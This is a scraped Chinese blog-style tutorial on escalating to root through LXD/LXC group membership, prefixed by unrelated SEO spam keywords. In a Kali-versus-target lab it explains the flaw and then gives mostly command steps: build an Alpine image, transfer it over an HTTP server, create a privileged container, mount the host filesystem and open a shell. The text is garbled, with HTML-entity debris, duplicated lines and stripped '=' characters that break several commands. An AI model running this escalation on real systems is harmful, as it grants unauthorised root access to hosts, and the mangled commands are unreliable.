庆阳网站优化公司,镇江市城市建设投资公司官方网站,手机免费自建网站,一个公司可以做几个网站备案lxd/lxc提权
漏洞介绍
lxd是一个root进程#xff0c;它可以负责执行任意用户的lxd#xff0c;unix套接字写入访问操作。而且在一些情况下#xff0c;lxd不会调用它的用户权限进行检查和匹配
原理可以理解为用用户创建一个容器#xff0c;再用容器挂载宿主机磁盘#xf…lxd/lxc提权
漏洞介绍
lxd是一个root进程它可以负责执行任意用户的lxdunix套接字写入访问操作。而且在一些情况下lxd不会调用它的用户权限进行检查和匹配
原理可以理解为用用户创建一个容器再用容器挂载宿主机磁盘最后使用容器权限操作宿主机磁盘内容达到提权效果
提权复现
环境攻击机kali 192.168.31.131 靶机 192.168.31.134 在攻击机kali上操作
通过git将构建好的alpine镜像克隆到本地,并构建
git clone https://github.com/saghul/lxd-alpine-builder
cd lxd-alpine-builder
sed -i s,yaml_pathlatest-stable/releases/$apk_arch/latest-releases.yaml,yaml_pathv3.8/releases/$apk_arch/latest-releases.yaml, build-alpine
sudo ./build-alpine -a i686然后将自己操作系统对应架构tar文件发送到靶机上
python -m http.server 8848然后在下载的目录上使用此命令导入镜像
lxc image import ./alpine*.tar.gz --alias myimage 初始化镜像,一路回车选择默认不过会有几个显示以及存在default让你重命名的选择了就可以
lxd init可能最后报错但是也没关系
例如 运行镜像
lxc init myimage mycontainer -c security.privilegedtrue将/root挂载到镜像中
lxc config device add mycontainer mydevice disk source/ path/mnt/root recursivetrue与镜像交互
lxc start mycontainer
lxc exec mycontainer /bin/shlxc start mycontainer
lxc exec mycontainer /bin/sh
